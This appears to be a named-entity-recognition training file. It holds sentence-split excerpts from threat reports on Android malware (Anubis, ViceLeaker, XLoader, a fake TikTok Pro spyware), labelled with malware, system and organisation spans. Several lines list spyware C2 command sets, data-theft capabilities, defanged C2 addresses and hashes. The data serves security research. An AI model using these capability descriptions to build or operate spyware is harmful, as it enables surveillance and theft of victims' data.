{"text": "It adds the file extension .AnubisCrypt to each encrypted file and sends it to the C2 .", "spans": {}, "info": {"id": "cyner_train_002464", "source": "cyner_train"}}
{"text": "Figure 7 – C2 As seen in Figure 8 , this version of Anubis is built to run on several iterations of the Android operating system , dating back to version 4.0.3 , which was released in 2012 .", "spans": {"MALWARE: Anubis": [[52, 58]], "SYSTEM: Android": [[104, 111]]}, "info": {"id": "cyner_train_002466", "source": "cyner_train"}}
{"text": "Figure 8 – Android requirements Android malware has been around for many years and will be with us for the foreseeable future .", "spans": {"SYSTEM: Android": [[11, 18], [32, 39]]}, "info": {"id": "cyner_train_002467", "source": "cyner_train"}}
{"text": "APK files will not natively open in an environment other than an Android device .", "spans": {"SYSTEM: Android": [[65, 72]]}, "info": {"id": "cyner_train_002469", "source": "cyner_train"}}
{"text": "With the increased use of Android phones in business environments , it is important to defend against these threats by ensuring devices are kept current with the latest updates .", "spans": {"SYSTEM: Android": [[26, 33]]}, "info": {"id": "cyner_train_002470", "source": "cyner_train"}}
{"text": "Limiting app installations on corporate devices , as well as ensuring that applications are created by trusted developers on official marketplaces , can help in reducing the risk of infection as well .", "spans": {}, "info": {"id": "cyner_train_002471", "source": "cyner_train"}}
{"text": "Kaspersky spyware sensors caught the signal of an attack from the device of one of the victims ; and a hash of the APK involved ( Android application ) was tagged in our sample feed for inspection .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "SYSTEM: Android": [[130, 137]]}, "info": {"id": "cyner_train_002473", "source": "cyner_train"}}
{"text": "Once we looked into the file , we quickly found out that the inner-workings of the APK included a malicious payload , embedded in the original code of the application .", "spans": {}, "info": {"id": "cyner_train_002474", "source": "cyner_train"}}
{"text": "This was an original spyware program , designed to exfiltrate almost all accessible information .", "spans": {}, "info": {"id": "cyner_train_002475", "source": "cyner_train"}}
{"text": "Researchers from Bitdefender also released an analysis of one of the samples in a blogpost .", "spans": {"ORGANIZATION: Bitdefender": [[17, 28]]}, "info": {"id": "cyner_train_002477", "source": "cyner_train"}}
{"text": "Although something had already been published , we decided to do something different with the data we acquired .", "spans": {}, "info": {"id": "cyner_train_002478", "source": "cyner_train"}}
{"text": "We decided to call the operation “ ViceLeaker ” , because of strings and variables in its code .", "spans": {"MALWARE: ViceLeaker": [[35, 45]]}, "info": {"id": "cyner_train_002480", "source": "cyner_train"}}
{"text": "Mobile ViceLeaker The following table shows meta information on the observed samples , including compiler timestamps : MD5 Package Compiler C2 51df2597faa3fce38a4c5ae024f97b1c com.xapps.SexGameForAdults dexlib 2.x 188.165.28 [ .", "spans": {"MALWARE: ViceLeaker": [[7, 17]]}, "info": {"id": "cyner_train_002481", "source": "cyner_train"}}
{"text": "] 251 2d108ff3a735dea1d1fdfa430f37fab2 com.psiphon3 dexlib 2.x 188.165.49 [ .", "spans": {}, "info": {"id": "cyner_train_002482", "source": "cyner_train"}}
{"text": "] 205 7ed754a802f0b6a1740a99683173db73 com.psiphon3 dexlib 2.x 188.165.49 [ .", "spans": {}, "info": {"id": "cyner_train_002483", "source": "cyner_train"}}
{"text": "] 205 3b89e5cd49c05ce6dc681589e6c368d9 ir.abed.dastan dexlib 2.x 185.141.60 [ .", "spans": {}, "info": {"id": "cyner_train_002484", "source": "cyner_train"}}
{"text": "Original code of the APK on the left , versus injected APK on the right The analysis of the APK was rather interesting , because some of the actions were very common spyware features , such as the exfiltration of SMS messages , call logs and other data .", "spans": {}, "info": {"id": "cyner_train_002487", "source": "cyner_train"}}
{"text": "The malware uses HTTP for communication with the C2 server for command handling and data exfiltration .", "spans": {}, "info": {"id": "cyner_train_002489", "source": "cyner_train"}}
{"text": "Here is a command and control protocol fragment : Commands from C2 server parsing In total , the malicious APK handles 16 different commands : Command Endpoint Description 1 reqsmscal.php Send specified SMS message 2 reqsmscal.php Call specified number 3 reqsmscal.php Exfiltrate device info , such as phone model and OS version 4 reqsmscal.php Exfiltrate a list of all installed applications 5 reqsmscal.php Exfiltrate default browser history ( limited to a given date ) 6 reqsmscal.php", "spans": {}, "info": {"id": "cyner_train_002490", "source": "cyner_train"}}
{"text": "Exfiltrate Chrome browser history ( limited to a given date ) 7 reqsmscal.php Exfiltrate memory card file structure 8 reqsmscal.php Record surrounding sound for 80 seconds 1 reqcalllog.php Exfiltrate all call logs 2 reqcalllog.php Exfiltrate all SMS messages 3 reqcalllog.php Upload specified file from the device to the C2 4 reqcalllog.php Download file from specified URL and save on device 5 reqcalllog.php Delete specified file 6,7,8 reqcalllog.php Commands not yet", "spans": {}, "info": {"id": "cyner_train_002491", "source": "cyner_train"}}
{"text": "implemented 9 reqcalllog.php Take photo ( muted audio ) with rear camera , send to C2 10 reqcalllog.php Take photo ( muted audio ) with front camera , send to C2 All observed samples with Smali injections were signed by the same debug certificate ( 0x936eacbe07f201df ) .", "spans": {}, "info": {"id": "cyner_train_002492", "source": "cyner_train"}}
{"text": "As we know from our investigation , traces of the first development activities were found at the end of 2016 , but the main distribution campaign began in 2018 ( end of 2017 ) .", "spans": {}, "info": {"id": "cyner_train_002493", "source": "cyner_train"}}
{"text": "Based on our detection statistics , the main infection vector is the spread of Trojanized applications directly to victims via Telegram and WhatsApp messengers .", "spans": {}, "info": {"id": "cyner_train_002494", "source": "cyner_train"}}
{"text": "There are the following relevant detection paths ( the last one is an alternative Telegram client – “ Telegram X “ ) : Name Detection path Sex Game For Adults 18.apk /storage/emulated/0/WhatsApp/Media/WhatsApp Documents/ 4_6032967490689041387.apk /storage/emulated/0/Telegram/Telegram Documents/ Psiphon-v91.apk /storage/emulated/0/Android/data/org.thunderdog.challegram/files/documents/ Backdoored Open Source During the course", "spans": {}, "info": {"id": "cyner_train_002495", "source": "cyner_train"}}
{"text": "of our analysis , we also found samples sharing code with the ViceLeaker malware , in particular they shared a delimiter that was used in both cases to parse commands from the C2 server .", "spans": {"MALWARE: ViceLeaker": [[62, 72]]}, "info": {"id": "cyner_train_002496", "source": "cyner_train"}}
{"text": "This would be a very unusual coincidence .", "spans": {}, "info": {"id": "cyner_train_002497", "source": "cyner_train"}}
{"text": "Even when a false flag might also be a possibility , we consider this to be unlikely .", "spans": {}, "info": {"id": "cyner_train_002498", "source": "cyner_train"}}
{"text": "The samples sharing this overlap are modified versions of an open source Jabber/XMPP client called “ Conversations ” with some code additions .", "spans": {"SYSTEM: Jabber/XMPP": [[73, 84]]}, "info": {"id": "cyner_train_002499", "source": "cyner_train"}}
{"text": "The legitimate version of this app is also available on Google Play .", "spans": {"SYSTEM: Google Play": [[56, 67]]}, "info": {"id": "cyner_train_002500", "source": "cyner_train"}}
{"text": "The Conversations modified samples differ from the original one in the getKnownHosts method that was modified to replace the main XMPP host with the attackers ’ C2 server : It appears that the attackers were using a specific C2 for the use of that app .", "spans": {"SYSTEM: XMPP": [[130, 134]]}, "info": {"id": "cyner_train_002501", "source": "cyner_train"}}
{"text": "Another important modification is in the message transfer process : With this modification , an application sends device location coordinates with every message .", "spans": {}, "info": {"id": "cyner_train_002502", "source": "cyner_train"}}
{"text": "In addition , we did not see traces of the Smali injection .", "spans": {}, "info": {"id": "cyner_train_002504", "source": "cyner_train"}}
{"text": "In this case we found traces of dx/dexmerge compilers , which means that , this time , the attackers just imported the original source code into an Android IDE ( such as Android Studio , for instance ) and compiled it with their own modifications .", "spans": {"SYSTEM: Android": [[148, 155]], "SYSTEM: Android Studio": [[170, 184]]}, "info": {"id": "cyner_train_002505", "source": "cyner_train"}}
{"text": "We do not know why , but we suspect that it was an attempt to hide the origin of the application .", "spans": {}, "info": {"id": "cyner_train_002507", "source": "cyner_train"}}
{"text": "This brought to us the hypothesis that this might be a version used by the group behind ViceLeaker for internal communication or for other , unclear purposes .", "spans": {"MALWARE: ViceLeaker": [[88, 98]]}, "info": {"id": "cyner_train_002509", "source": "cyner_train"}}
{"text": "All the detections of this backdoored app were geolocated in Iran .", "spans": {}, "info": {"id": "cyner_train_002510", "source": "cyner_train"}}
{"text": "Backdoored Conversations C2 server analysis During the analysis of the Smali injected apps and their C2 server infrastructure we hadn ’ t found any interesting clues , but things changed when we looked at the C2 server of the linked Conversations messenger .", "spans": {}, "info": {"id": "cyner_train_002511", "source": "cyner_train"}}
{"text": "It uses “ 185.51.201 [ .", "spans": {}, "info": {"id": "cyner_train_002512", "source": "cyner_train"}}
{"text": "] 133 ” as a main C2 address , and there is only one domain that is hosted on this dedicated server – iliageram [ .", "spans": {}, "info": {"id": "cyner_train_002513", "source": "cyner_train"}}
{"text": "Note that we later found versions that used the domain as a C2 directly instead of the IP address .", "spans": {}, "info": {"id": "cyner_train_002515", "source": "cyner_train"}}
{"text": "The record contains a personal email address : WHOIS records of C2 server exposing the attacker ’ s email address We were aware of the possibility that the attackers might be using a compromised email account , so we dug deeper to find more information related to this email address .", "spans": {}, "info": {"id": "cyner_train_002516", "source": "cyner_train"}}
{"text": "A quick search produced results about a personal page and , what is more interesting , a GitHub account that contains a forked Conversation repository .", "spans": {"ORGANIZATION: GitHub": [[89, 95]]}, "info": {"id": "cyner_train_002517", "source": "cyner_train"}}
{"text": "Related Github account contains forked Conversations repository Summarizing all the found clues , we have the following attribution flow : Conclusion The operation of ViceLeaker is still ongoing , as is our research .", "spans": {"ORGANIZATION: Github": [[8, 14]], "MALWARE: ViceLeaker": [[167, 177]]}, "info": {"id": "cyner_train_002518", "source": "cyner_train"}}
{"text": "Trend Micro detects these as ANDROIDOS_XLOADER.HRX .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]]}, "info": {"id": "cyner_train_002524", "source": "cyner_train"}}
{"text": "By : Trend Micro April 20 , 2018 We have been detecting a new wave of network attacks since early March , which , for now , are targeting Japan , Korea , China , Taiwan , and Hong Kong .", "spans": {"ORGANIZATION: Trend Micro": [[5, 16]]}, "info": {"id": "cyner_train_002525", "source": "cyner_train"}}
{"text": "The attacks use Domain Name System ( DNS ) cache poisoning/DNS spoofing , possibly through infringement techniques such as brute-force or dictionary attacks , to distribute and install malicious Android apps .", "spans": {"SYSTEM: Android": [[195, 202]]}, "info": {"id": "cyner_train_002526", "source": "cyner_train"}}
{"text": "These malware pose as legitimate Facebook or Chrome applications .", "spans": {"SYSTEM: Facebook": [[33, 41]], "SYSTEM: Chrome": [[45, 51]]}, "info": {"id": "cyner_train_002528", "source": "cyner_train"}}
{"text": "They are distributed from polluted DNS domains that send a notification to an unknowing victim ’ s device .", "spans": {}, "info": {"id": "cyner_train_002529", "source": "cyner_train"}}
{"text": "XLoader can also hijack the infected device ( i.e. , send SMSs ) and sports self-protection/persistence mechanisms through device administrator privileges .", "spans": {"MALWARE: XLoader": [[0, 7]]}, "info": {"id": "cyner_train_002531", "source": "cyner_train"}}
{"text": "Infection Chain As with our earlier reports in late March , the attack chain involves diverting internet traffic to attacker-specified domains by compromising and overwriting the router ’ s DNS settings .", "spans": {}, "info": {"id": "cyner_train_002532", "source": "cyner_train"}}
{"text": "A fake alert will notify and urge the user to access the malicious domain and download XLoader .", "spans": {"MALWARE: XLoader": [[87, 94]]}, "info": {"id": "cyner_train_002533", "source": "cyner_train"}}
{"text": "Technical Analysis XLoader first loads the encrypted payload from Assets/db as test.dex to drop the necessary modules then requests for device administrator privileges .", "spans": {"MALWARE: XLoader": [[19, 26]]}, "info": {"id": "cyner_train_002534", "source": "cyner_train"}}
{"text": "Once granted permission , it hides its icon from the launcher application list then starts a service that it keeps running in the background .", "spans": {}, "info": {"id": "cyner_train_002535", "source": "cyner_train"}}
{"text": "Here is a list of broadcast actions : android.provider.Telephony.SMS_RECEIVED android.net.conn.CONNECTIVITY_CHANGE android.intent.action.BATTERY_CHANGED android.intent.action.USER_PRESENT android.intent.action.PHONE_STATE android.net.wifi.SCAN_RESULTS android.intent.action.PACKAGE_ADDED android.intent.action.PACKAGE_REMOVED android.intent.action.SCREEN_OFF android.intent.action.SCREEN_ON", "spans": {}, "info": {"id": "cyner_train_002539", "source": "cyner_train"}}
{"text": "android.media.RINGER_MODE_CHANGED android.sms.msg.action.SMS_SEND android.sms.msg.action.SMS_DELIVERED Creating a Web Server to Phish XLoader creates a provisional web server to receive the broadcast events .", "spans": {"MALWARE: XLoader": [[134, 141]]}, "info": {"id": "cyner_train_002540", "source": "cyner_train"}}
{"text": "It can also create a simple HTTP server on the infected device to deceive victims .", "spans": {}, "info": {"id": "cyner_train_002541", "source": "cyner_train"}}
{"text": "It shows a web phishing page whenever the affected device receives a broadcast event ( i.e. , if a new package is installed or if the device ’ s screen is on ) to steal personal data , such as those keyed in for banking apps .", "spans": {}, "info": {"id": "cyner_train_002542", "source": "cyner_train"}}
{"text": "The phishing page is translated in Korean , Japanese , Chinese , and English , which are hardcoded in the payload .", "spans": {}, "info": {"id": "cyner_train_002543", "source": "cyner_train"}}
{"text": "Its data-stealing capabilities include collecting SMSs after receiving an SMS-related broadcast event and covertly recording phone calls .", "spans": {}, "info": {"id": "cyner_train_002546", "source": "cyner_train"}}
{"text": "XLoader can also hijack accounts linked to financial or game-related apps installed on the affected device .", "spans": {"MALWARE: XLoader": [[0, 7]]}, "info": {"id": "cyner_train_002547", "source": "cyner_train"}}
{"text": "XLoader can also start other attacker-specified packages .", "spans": {"MALWARE: XLoader": [[0, 7]]}, "info": {"id": "cyner_train_002548", "source": "cyner_train"}}
{"text": "By monitoring the package installation broadcast event , XLoader can start their packages .", "spans": {"MALWARE: XLoader": [[57, 64]]}, "info": {"id": "cyner_train_002550", "source": "cyner_train"}}
{"text": "This enables it to launch malicious apps without the user ’ s awareness and explicit consent .", "spans": {}, "info": {"id": "cyner_train_002551", "source": "cyner_train"}}
{"text": "We reverse engineered XLoader and found that it appears to target South Korea-based banks and game development companies .", "spans": {"MALWARE: XLoader": [[22, 29]]}, "info": {"id": "cyner_train_002552", "source": "cyner_train"}}
{"text": "XLoader also prevents victims from accessing the device ’ s settings or using a known antivirus ( AV ) app in the country .", "spans": {"MALWARE: XLoader": [[0, 7]]}, "info": {"id": "cyner_train_002553", "source": "cyner_train"}}
{"text": "XLoader can also load multiple malicious modules to receive and execute commands from its remote command-and-control ( C & C ) server , as shown below : Here ’ s a list of the modules and their functions : sendSms — send SMS/MMS to a specified address setWifi — enable or disable Wi-Fi connection gcont — collect all the device ’ s contacts lock — currently just an input lock status in the settings ( pref ) file , but may be used as a screenlocking ransomware bc — collect all contacts", "spans": {"MALWARE: XLoader": [[0, 7]]}, "info": {"id": "cyner_train_002554", "source": "cyner_train"}}
{"text": "from the Android device and SIM card setForward — currently not implemented , but can be used to hijack the infected device getForward — currently not implemented , but can be used to hijack the infected device hasPkg — check the device whether a specified app is installed or not setRingerMode — set the device ’ s ringer mode setRecEnable — set the device ’ s ringer mode as silent reqState — get a detailed phone connection status , which includes activated network and Wi-Fi ( with or without password ) showHome —", "spans": {"SYSTEM: Android": [[9, 16]]}, "info": {"id": "cyner_train_002555", "source": "cyner_train"}}
{"text": "force the device ’ s back to the home screen getnpki : get files/content from the folder named NPKI ( contains certificates related to financial transactions ) http — access a specified network using HttpURLConnection onRecordAction — simulate a number-dialed tone call — call a specified number get_apps — get all the apps installed on the device show_fs_float_window — show a full-screen window for phishing Of note is XLoader ’ s abuse of the WebSocket protocol ( supported in many browsers", "spans": {"MALWARE: XLoader": [[421, 428]]}, "info": {"id": "cyner_train_002556", "source": "cyner_train"}}
{"text": "and web applications ) via ws ( WebSockets ) or wss ( WebSockets over SSL/TLS ) to communicate with its C & C servers .", "spans": {}, "info": {"id": "cyner_train_002557", "source": "cyner_train"}}
{"text": "The abuse of the WebSocket protocol provides XLoader with a persistent connection between clients and servers where data can be transported any time .", "spans": {"MALWARE: XLoader": [[45, 52]]}, "info": {"id": "cyner_train_002559", "source": "cyner_train"}}
{"text": "Mitigations XLoader will not download malicious apps if the Android device uses a mobile data connection .", "spans": {"MALWARE: XLoader": [[12, 19]]}, "info": {"id": "cyner_train_002561", "source": "cyner_train"}}
{"text": "Nevertheless , users should practice proper security hygiene to mitigate threats that may take advantage of a home or business router ’ s security gaps .", "spans": {}, "info": {"id": "cyner_train_002562", "source": "cyner_train"}}
{"text": "Employ stronger credentials , for instance , to make them less susceptible to unauthorized access .", "spans": {}, "info": {"id": "cyner_train_002563", "source": "cyner_train"}}
{"text": "Regularly update and patch the router ’ s software and firmware to prevent exploits , and enable its built-in firewall .", "spans": {}, "info": {"id": "cyner_train_002564", "source": "cyner_train"}}
{"text": "For system administrators and information security professionals , configuring the router to be more resistant to attacks like DNS cache poisoning can help mitigate similar threats .", "spans": {}, "info": {"id": "cyner_train_002565", "source": "cyner_train"}}
{"text": "Everyday users can do the same by checking the router ’ s DNS settings if they ’ ve been modified .", "spans": {}, "info": {"id": "cyner_train_002566", "source": "cyner_train"}}
{"text": "Even threats like DNS cache poisoning employ social engineering , so users should also be more prudent against suspicious or unknown messages that have telltale signs of malware .", "spans": {}, "info": {"id": "cyner_train_002567", "source": "cyner_train"}}
{"text": "We have worked with Google and they ensure that Google Play Protect proactively catches apps of this nature .", "spans": {"ORGANIZATION: Google": [[20, 26]], "SYSTEM: Google Play Protect": [[48, 67]]}, "info": {"id": "cyner_train_002568", "source": "cyner_train"}}
{"text": "No instances of these apps were found in Google Play .", "spans": {"SYSTEM: Google Play": [[41, 52]]}, "info": {"id": "cyner_train_002569", "source": "cyner_train"}}
{"text": "September 08 , 2020 TikTok Spyware A detailed analysis of spyware masquerading as TikTok A recent threat to ban TikTok in the United States has taken the internet by storm and received mixed reactions from social media and internet users .", "spans": {"SYSTEM: TikTok": [[20, 26], [82, 88], [112, 118]]}, "info": {"id": "cyner_train_002570", "source": "cyner_train"}}
{"text": "U.S. President Donald Trump has ordered ByteDance , the parent company of TikTok , to sell its U.S. TikTok assets and also issued executive orders that would ban the social media apps TikTok and WeChat from operating in the U.S. if the sale doesn ’ t happen in the next few weeks .", "spans": {"ORGANIZATION: ByteDance": [[40, 49]], "SYSTEM: TikTok": [[74, 80], [100, 106], [184, 190]], "SYSTEM: WeChat": [[195, 201]]}, "info": {"id": "cyner_train_002571", "source": "cyner_train"}}
{"text": "On the other side , ByteDance has filed a lawsuit suing the Trump administration .", "spans": {"ORGANIZATION: ByteDance": [[20, 29]]}, "info": {"id": "cyner_train_002572", "source": "cyner_train"}}
{"text": "When popular applications come under fire and are featured prominently in the news , hackers get excited as these newsworthy apps can become their latest target .", "spans": {}, "info": {"id": "cyner_train_002573", "source": "cyner_train"}}
{"text": "Generally , after an application gets banned from an official app store , such as Google Play , users try to find alternative ways to download the app .", "spans": {"SYSTEM: Google Play": [[82, 93]]}, "info": {"id": "cyner_train_002575", "source": "cyner_train"}}
{"text": "In doing so , users can become victims to malicious apps portraying themselves as the original app .", "spans": {}, "info": {"id": "cyner_train_002576", "source": "cyner_train"}}
{"text": "Recently there was a huge wave of SMS messages , as well as Whatsapp messages , making the rounds asking users to download the latest version of TikTok at hxxp : //tiny [ .", "spans": {"SYSTEM: Whatsapp": [[60, 68]], "SYSTEM: TikTok": [[145, 151]]}, "info": {"id": "cyner_train_002577", "source": "cyner_train"}}
{"text": "In reality , this downloaded app is a fake app that asks for credentials and Android permissions ( including camera and phone permissions ) , resulting in the user being bombarded with advertisements .", "spans": {"SYSTEM: Android": [[77, 84]]}, "info": {"id": "cyner_train_002579", "source": "cyner_train"}}
{"text": "Recently , we have come across another variant of this app portraying itself as TikTok Pro , but this is a full-fledged spyware with premium features to spy on victim with ease .", "spans": {"SYSTEM: TikTok Pro": [[80, 90]]}, "info": {"id": "cyner_train_002580", "source": "cyner_train"}}
{"text": "( Please note this is a different app and not the same as the one being spread by hxxp : //tiny [ .", "spans": {}, "info": {"id": "cyner_train_002581", "source": "cyner_train"}}
{"text": ") Technical Analysis App Name : TikTok Pro Hash : 9fed52ee7312e217bd10d6a156c8b988 Package Name : com.example.dat.a8andoserverx Upon installation , the spyware portrays itself as TikTok using the name TikTok Pro .", "spans": {"SYSTEM: TikTok Pro": [[32, 42], [201, 211]], "SYSTEM: TikTok": [[179, 185]]}, "info": {"id": "cyner_train_002583", "source": "cyner_train"}}
{"text": "As soon as a user tries to open the app , it launches a fake notification and soon the notification as well as the app icon disappears .", "spans": {}, "info": {"id": "cyner_train_002584", "source": "cyner_train"}}
{"text": "This fake notification tactic is used to redirect the user 's attention , meanwhile the app hides itself , making the user believe the app to be faulty .", "spans": {}, "info": {"id": "cyner_train_002585", "source": "cyner_train"}}
{"text": "This functionality can be seen in Figure 1 .", "spans": {}, "info": {"id": "cyner_train_002586", "source": "cyner_train"}}
{"text": "First , an activity named MainActivity fires up , taking care of hiding the icon and showing the fake notification .", "spans": {}, "info": {"id": "cyner_train_002589", "source": "cyner_train"}}
{"text": "The spyware also appears to have an additional payload stored under the /res/raw/ directory .", "spans": {}, "info": {"id": "cyner_train_002591", "source": "cyner_train"}}
{"text": "The conditions to build an additional payload are never met .", "spans": {}, "info": {"id": "cyner_train_002595", "source": "cyner_train"}}
{"text": "Going one step further , we rebuilt the malware to execute the apparent functionality of generating a payload , but discovered that the APK stored in the /res/raw/ directory is empty .", "spans": {}, "info": {"id": "cyner_train_002596", "source": "cyner_train"}}
{"text": "The placement of the decoy functionality is likely designed to confuse the malware researchers .", "spans": {}, "info": {"id": "cyner_train_002597", "source": "cyner_train"}}
{"text": "It is also possible that this functionality is under development , making this placeholder code incomplete .", "spans": {}, "info": {"id": "cyner_train_002598", "source": "cyner_train"}}
{"text": "MainService is the brain of this spyware and controls almost everything—from stealing the victim 's data to deleting it .", "spans": {}, "info": {"id": "cyner_train_002601", "source": "cyner_train"}}
{"text": "All of its capabilities are discussed later in this blog .", "spans": {}, "info": {"id": "cyner_train_002602", "source": "cyner_train"}}
{"text": "Hide Icon Figure 3 : Code showing the hiding icon and starting service .", "spans": {}, "info": {"id": "cyner_train_002603", "source": "cyner_train"}}
{"text": "As MainService is the main controller , the developer has taken the appropriate actions to keep it functional and running at all times .", "spans": {}, "info": {"id": "cyner_train_002604", "source": "cyner_train"}}
{"text": "Broadcast receivers are components that allow you to register for various Android events .", "spans": {"SYSTEM: Android": [[74, 81]]}, "info": {"id": "cyner_train_002606", "source": "cyner_train"}}
{"text": "In this case , it registers three broadcast receivers : MyReceiver - Triggers when the device is booted .", "spans": {}, "info": {"id": "cyner_train_002607", "source": "cyner_train"}}
{"text": "MyReceiver and AlarmReceiver start the MainService whenever appropriate events occur .", "spans": {}, "info": {"id": "cyner_train_002610", "source": "cyner_train"}}
{"text": "This tactic is very common among malware developers to ensure the malware is not killed by the Android OS or by any other means .", "spans": {"SYSTEM: Android": [[95, 102]]}, "info": {"id": "cyner_train_002611", "source": "cyner_train"}}
{"text": "Figure 4 shows MyReceiver in action where it eventually calls the MainService service .", "spans": {}, "info": {"id": "cyner_train_002612", "source": "cyner_train"}}
{"text": "The InterceptCall receiver is triggered whenever there is an incoming or outgoing call .", "spans": {}, "info": {"id": "cyner_train_002614", "source": "cyner_train"}}
{"text": "It sets particular parameters in relation to call details and a further service named calls takes the control as seen in Figure 5 .", "spans": {}, "info": {"id": "cyner_train_002615", "source": "cyner_train"}}
{"text": "Call Service Figure 5 : Code for the calls service As seen above , the calls service stores incoming call details in .mp3 format in the /sdcard/DCIM/.dat/ directory with file name appended with \" In_ '' for incoming calls and \" Out_ '' for outgoing calls .", "spans": {}, "info": {"id": "cyner_train_002616", "source": "cyner_train"}}
{"text": "How these recorded calls are sent to the command and control server ( CnC ) is taken care of by MainService , which is discussed next .", "spans": {}, "info": {"id": "cyner_train_002617", "source": "cyner_train"}}
{"text": "This functionality can be seen in Figure 6 .", "spans": {}, "info": {"id": "cyner_train_002621", "source": "cyner_train"}}
{"text": "MainService has the following capabilities : Steal SMS messages Send SMS messages Steal the victim 's location Capture photos Execute commands Capture screenshots Call phone numbers Initiate other apps Steal Facebook credentials , etc All of the above functionalities take place on the basis of commands sent by the attacker .", "spans": {"SYSTEM: Facebook": [[208, 216]]}, "info": {"id": "cyner_train_002623", "source": "cyner_train"}}
{"text": "Stolen data is stored in external storage under the /DCIM/ directory with a hidden sub-directory named \" .dat '' .", "spans": {}, "info": {"id": "cyner_train_002624", "source": "cyner_train"}}
{"text": "Below is the list of all the commands catered by the C & C server .", "spans": {}, "info": {"id": "cyner_train_002625", "source": "cyner_train"}}
{"text": "Command Action Unistxcr Restart the app dowsizetr Send the file stored in the /sdcard/DCIM/.dat/ directory to the C & C server Caspylistx Get a list of all hidden files in the /DCIM/.dat/ directory spxcheck Check whether call details are collected by the spyware S8p8y0 Delete call details stored by the spyware screXmex Take screenshots of the device screen Batrxiops Check battery status L4oclOCMAWS Fetch the victim 's location GUIFXB Launch", "spans": {}, "info": {"id": "cyner_train_002626", "source": "cyner_train"}}
{"text": "the fake Facebook login page IODBSSUEEZ Send a file containing stolen Facebook credentials to the C & C server FdelSRRT Delete files containing stolen Facebook credentials chkstzeaw Launch Facebook LUNAPXER Launch apps according to the package name sent by the C & C server Gapxplister Get a list of all installed applications DOTRall8xxe Zip all the stolen files and store in the /DCIM/.dat/ directory Acouxacour Get a list of accounts on the victim 's device Fimxmiisx Open the camera", "spans": {"SYSTEM: Facebook": [[9, 17], [70, 78], [151, 159], [189, 197]]}, "info": {"id": "cyner_train_002627", "source": "cyner_train"}}
{"text": "Scxreexcv4 Capture an image micmokmi8x Capture audio Yufsssp Get latitude and longitude GExCaalsss7 Get call logs PHOCAs7 Call phone numbers sent by the C & C server Gxextsxms Get a list of inbox SMS messages Msppossag Send SMS with message body sent by the C & C server Getconstactx Get a list of all contacts Rinxgosa Play a ringtone bithsssp64 Execute commands sent by the C & C server DOWdeletx Deletes", "spans": {}, "info": {"id": "cyner_train_002628", "source": "cyner_train"}}
{"text": "the file specified by the C & C server Deldatall8 Delete all files stored in the /sdcard/DCIM/.dat/ directory We do n't have the space to cover all of the commands , but let 's take a look at some of the major ones .", "spans": {}, "info": {"id": "cyner_train_002629", "source": "cyner_train"}}
{"text": "Upon receiving the command GUIFXB , the spyware launches a fake Facebook login page .", "spans": {"SYSTEM: Facebook": [[64, 72]]}, "info": {"id": "cyner_train_002631", "source": "cyner_train"}}
{"text": "As soon as the victim tries to log in , it stores the victim 's credentials in /storage/0/DCIM/.fdat Facebook Login Figure 7 : Fake Facebook login The second command is IODBSSUEEZ , which further sends stolen credentials to the C & C server , as seen in Figure 8 .", "spans": {"SYSTEM: Facebook": [[101, 109], [132, 140]]}, "info": {"id": "cyner_train_002632", "source": "cyner_train"}}
{"text": "This functionality can be easily further extended to steal other information , such as bank credentials , although we did not see any banks being targeted in this attack .", "spans": {}, "info": {"id": "cyner_train_002634", "source": "cyner_train"}}
{"text": "Calling functionality Command PHOCAs7 initiates calling functionality .", "spans": {}, "info": {"id": "cyner_train_002635", "source": "cyner_train"}}
{"text": "Call Command Figure 9 : The calling functionality .", "spans": {}, "info": {"id": "cyner_train_002637", "source": "cyner_train"}}
{"text": "The phone number is fetched from a response from the C & C server and is stored in str3 variable , which further is utilized using the tel : function .", "spans": {}, "info": {"id": "cyner_train_002638", "source": "cyner_train"}}
{"text": "Stealing SMS The Gxextsxms command is responsible for fetching all the SMS messages from the victim 's device and sending it over to the C & C server .", "spans": {}, "info": {"id": "cyner_train_002639", "source": "cyner_train"}}
{"text": "Stealing SMS Figure 10 : Stealing SMS messages .", "spans": {}, "info": {"id": "cyner_train_002640", "source": "cyner_train"}}
{"text": "Similarly , there are many crucial commands that further allow this spyware to perform additional functionality , such as executing commands sent by the C & C , clicking photos , capturing screenshots , stealing location information , and more .", "spans": {}, "info": {"id": "cyner_train_002641", "source": "cyner_train"}}
{"text": "Further analysis Upon further research , we found this spyware to be developed by a framework similar to Spynote and Spymax , meaning this could be an updated version of these Trojan builders , which allow anyone , even with limited knowledge , to develop full-fledged spyware .", "spans": {"MALWARE: Spynote": [[105, 112]], "MALWARE: Spymax": [[117, 123]]}, "info": {"id": "cyner_train_002642", "source": "cyner_train"}}
{"text": "Many of the functionalities seen in this spyware are similar to Spynote and Spymax based on the samples we analyzed with some modifications .", "spans": {"MALWARE: Spynote": [[64, 71]], "MALWARE: Spymax": [[76, 82]]}, "info": {"id": "cyner_train_002643", "source": "cyner_train"}}
{"text": "This spyware sample communicates over dynamic DNS .", "spans": {}, "info": {"id": "cyner_train_002644", "source": "cyner_train"}}
{"text": "Other common functionalities include executing commands received from the attacker , taking screenshots of the victim 's device , fetching locations , stealing SMS messages and most common features that every spyware may poses .", "spans": {}, "info": {"id": "cyner_train_002646", "source": "cyner_train"}}
{"text": "Stealing Facebook credentials using fake Facebook activity is something we did n't observe in Spynote/Spymax versions but was seen in this spyware .", "spans": {"ORGANIZATION: Facebook": [[9, 17], [41, 49]], "MALWARE: Spynote/Spymax": [[94, 108]]}, "info": {"id": "cyner_train_002647", "source": "cyner_train"}}
{"text": "This framework allows anyone to develop a malicious app with the desired icon and communication address .", "spans": {}, "info": {"id": "cyner_train_002648", "source": "cyner_train"}}
{"text": "Some of the icons used can be seen below .", "spans": {}, "info": {"id": "cyner_train_002649", "source": "cyner_train"}}
{"text": "We found 280 such apps in the past three months .", "spans": {}, "info": {"id": "cyner_train_002650", "source": "cyner_train"}}
{"text": "It is very easy to trick victims to fall for such attacks .", "spans": {}, "info": {"id": "cyner_train_002656", "source": "cyner_train"}}
{"text": "In doing so , users can mistakenly install malicious apps , such as the spyware mentioned in this blog .", "spans": {}, "info": {"id": "cyner_train_002658", "source": "cyner_train"}}
{"text": "The precautions you take online have been covered extensively in almost all of our blogs ; even so , we believe this information bears repeating .", "spans": {}, "info": {"id": "cyner_train_002659", "source": "cyner_train"}}
{"text": "Always keep the \" Unknown Sources '' option disabled in the Android device .", "spans": {"SYSTEM: Android": [[60, 67]]}, "info": {"id": "cyner_train_002662", "source": "cyner_train"}}
